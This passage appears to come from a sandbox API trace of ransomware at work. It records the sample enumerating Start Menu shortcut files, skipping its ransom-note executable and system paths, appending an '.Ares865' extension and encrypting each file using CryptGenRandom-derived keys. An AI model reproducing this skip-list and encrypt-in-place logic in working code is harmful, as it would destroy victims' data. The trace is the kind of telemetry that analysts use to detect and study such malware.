szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.931] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.931] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.931] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.931] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.932] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.932] CloseHandle (hObject=0x118) returned 1 [0067.932] CloseHandle (hObject=0x12c) returned 1 [0067.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.932] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.932] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa575b1f, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0xa575b1f, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0xa575b1f, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4de, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="System Configuration.lnk", cAlternateFileName="SYSTEM~1.LNK")) returned 1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="aoldtz.exe") returned 1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2=".") returned 1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="..") returned 1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="windows") returned -1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="bootmgr") returned 1 [0067.932] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="temp") returned -1 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="pagefile.sys") returned 1 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="boot") returned 1 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="ids.txt") returned 1 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="ntuser.dat") returned 1 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="perflogs") returned 1 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2="MSBuild") returned 1 [0067.933] lstrlenW (lpString="System Configuration.lnk") returned 24 [0067.933] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\services.lnk") returned 72 [0067.933] lstrcpyW (in: lpString1=0x2cce478, lpString2="System Configuration.lnk" | out: lpString1="System Configuration.lnk") returned="System Configuration.lnk" [0067.933] lstrlenW (lpString="System Configuration.lnk") returned 24 [0067.933] lstrlenW (lpString="Ares865") returned 7 [0067.933] lstrcmpiW (lpString1="ion.lnk", lpString2="Ares865") returned 1 [0067.933] lstrlenW (lpString=".dll") returned 4 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2=".dll") returned 1 [0067.933] lstrlenW (lpString=".lnk") returned 4 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2=".lnk") returned 1 [0067.933] lstrlenW (lpString=".ini") returned 4 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2=".ini") returned 1 [0067.933] lstrlenW (lpString=".sys") returned 4 [0067.933] lstrcmpiW (lpString1="System Configuration.lnk", lpString2=".sys") returned 1 [0067.933] lstrlenW (lpString="System Configuration.lnk") returned 24 [0067.933] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk.Ares865") returned 92 [0067.933] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\system configuration.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\system configuration.lnk.ares865"), dwFlags=0x1) returned 1 [0067.935] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\system configuration.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.935] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1246) returned 1 [0067.935] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.935] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.935] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.935] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.936] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.936] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.936] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x118 [0067.938] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0067.938] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.939] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.939] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.939] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.939] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.940] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.940] CloseHandle (hObject=0x118) returned 1 [0067.940] CloseHandle (hObject=0x12c) returned 1 [0067.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.940] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.940] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2b99f553, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x2b99f553, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x2b99f553, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4ee, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Task Scheduler.lnk", cAlternateFileName="TASKSC~1.LNK")) returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="aoldtz.exe") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2=".") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="..") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="windows") returned -1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="bootmgr") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="temp") returned -1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="pagefile.sys") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="boot") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="ids.txt") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="ntuser.dat") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="perflogs") returned 1 [0067.940] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2="MSBuild") returned 1 [0067.940] lstrlenW (lpString="Task Scheduler.lnk") returned 18 [0067.941] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\System Configuration.lnk") returned 84 [0067.941] lstrcpyW (in: lpString1=0x2cce478, lpString2="Task Scheduler.lnk" | out: lpString1="Task Scheduler.lnk") returned="Task Scheduler.lnk" [0067.941] lstrlenW (lpString="Task Scheduler.lnk") returned 18 [0067.941] lstrlenW (lpString="Ares865") returned 7 [0067.941] lstrcmpiW (lpString1="ler.lnk", lpString2="Ares865") returned 1 [0067.941] lstrlenW (lpString=".dll") returned 4 [0067.941] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2=".dll") returned 1 [0067.941] lstrlenW (lpString=".lnk") returned 4 [0067.941] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2=".lnk") returned 1 [0067.941] lstrlenW (lpString=".ini") returned 4 [0067.941] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2=".ini") returned 1 [0067.941] lstrlenW (lpString=".sys") returned 4 [0067.941] lstrcmpiW (lpString1="Task Scheduler.lnk", lpString2=".sys") returned 1 [0067.941] lstrlenW (lpString="Task Scheduler.lnk") returned 18 [0067.941] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk.Ares865") returned 86 [0067.941] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\task scheduler.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\task scheduler.lnk.ares865"), dwFlags=0x1) returned 1 [0067.942] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\task scheduler.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.942] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1262) returned 1 [0067.942] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.943] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.943] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.943] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.943] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.944] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x118 [0067.945] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x190000 [0067.946] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.946] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.946] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.947] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.947] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.947] CloseHandle (hObject=0x118) returned 1 [0067.947] CloseHandle (hObject=0x12c) returned 1 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.947] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.947] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x191902f2, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x191902f2, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x1937f4d5, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4fa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows Firewall with Advanced Security.lnk", cAlternateFileName="WINDOW~2.LNK")) returned 1 [0067.947] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="aoldtz.exe") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2=".") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="..") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="windows") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="bootmgr") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="temp") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="pagefile.sys") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="boot") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="ids.txt") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="ntuser.dat") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="perflogs") returned 1 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2="MSBuild") returned 1 [0067.948] lstrlenW (lpString="Windows Firewall with Advanced Security.lnk") returned 43 [0067.948] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Task Scheduler.lnk") returned 78 [0067.948] lstrcpyW (in: lpString1=0x2cce478, lpString2="Windows Firewall with Advanced Security.lnk" | out: lpString1="Windows Firewall with Advanced Security.lnk") returned="Windows Firewall with Advanced Security.lnk" [0067.948] lstrlenW (lpString="Windows Firewall with Advanced Security.lnk") returned 43 [0067.948] lstrlenW (lpString="Ares865") returned 7 [0067.948] lstrcmpiW (lpString1="ity.lnk", lpString2="Ares865") returned 1 [0067.948] lstrlenW (lpString=".dll") returned 4 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2=".dll") returned 1 [0067.948] lstrlenW (lpString=".lnk") returned 4 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2=".lnk") returned 1 [0067.948] lstrlenW (lpString=".ini") returned 4 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2=".ini") returned 1 [0067.948] lstrlenW (lpString=".sys") returned 4 [0067.948] lstrcmpiW (lpString1="Windows Firewall with Advanced Security.lnk", lpString2=".sys") returned 1 [0067.948] lstrlenW (lpString="Windows Firewall with Advanced Security.lnk") returned 43 [0067.948] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk.Ares865") returned 111 [0067.948] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk.ares865"), dwFlags=0x1) returned 1 [0067.950] CreateFileW (lpFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\windows firewall with advanced security.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x12c [0067.950] GetFileSizeEx (in: hFile=0x12c, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1274) returned 1 [0067.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0067.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3148 [0067.950] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0067.950] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0067.951] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0067.951] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.951] CreateFileMappingW (hFile=0x12c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x800, lpName=0x0) returned 0x118 [0067.952] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x800) returned 0x190000 [0067.953] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0067.954] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0067.954] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0067.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0067.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0067.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0067.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0067.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0067.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0067.954] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9b60 [0067.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0067.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9b60 | out: hHeap=0x2b0000) returned 1 [0067.954] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0067.954] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0067.954] CloseHandle (hObject=0x118) returned 1 [0067.955] CloseHandle (hObject=0x12c) returned 1 [0067.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3148 | out: hHeap=0x2b0000) returned 1 [0067.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0067.955] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0067.955] FindNextFileW (in: hFindFile=0x2ccea8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8038cbd7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bed1018, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7bed1018, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0xab5, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Windows PowerShell Modules.lnk", cAlternateFileName="WINDOW~1.LNK")) returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="aoldtz.exe") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2=".") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="..") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="windows") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="bootmgr") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="temp") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="pagefile.sys") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="boot") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="ids.txt") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="ntuser.dat") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="perflogs") returned 1 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2="MSBuild") returned 1 [0067.955] lstrlenW (lpString="Windows PowerShell Modules.lnk") returned 30 [0067.955] lstrlenW (lpString="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows Firewall with Advanced Security.lnk") returned 103 [0067.955] lstrcpyW (in: lpString1=0x2cce478, lpString2="Windows PowerShell Modules.lnk" | out: lpString1="Windows PowerShell Modules.lnk") returned="Windows PowerShell Modules.lnk" [0067.955] lstrlenW (lpString="Windows PowerShell Modules.lnk") returned 30 [0067.955] lstrlenW (lpString="Ares865") returned 7 [0067.955] lstrcmpiW (lpString1="les.lnk", lpString2="Ares865") returned 1 [0067.955] lstrlenW (lpString=".dll") returned 4 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2=".dll") returned 1 [0067.955] lstrlenW (lpString=".lnk") returned 4 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2=".lnk") returned 1 [0067.955] lstrlenW (lpString=".ini") returned 4 [0067.955] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2=".ini") returned 1 [0067.956] lstrlenW (lpString=".sys") returned 4 [0067.956] lstrcmpiW (lpString1="Windows PowerShell Modules.lnk", lpString2=".sys") returned 1 [0067.956] lstrlenW (lpString="Windows PowerShell Modules.lnk") returned 30 [0067.956] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk.Ares865") returned 98 [0067.956] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\windows powershell modules.lnk"), lpNewFileName="C:\\Users\\All Users\\Start Menu\\Programs\\Administrative Tools\\Windows PowerShell Modules.lnk.Ares865" (normalized: "c:\\users\\all users\\start menu\\programs\\administrative tools\\windows powershell modules.lnk.ares865"), dwFlags=0x1) returned 1 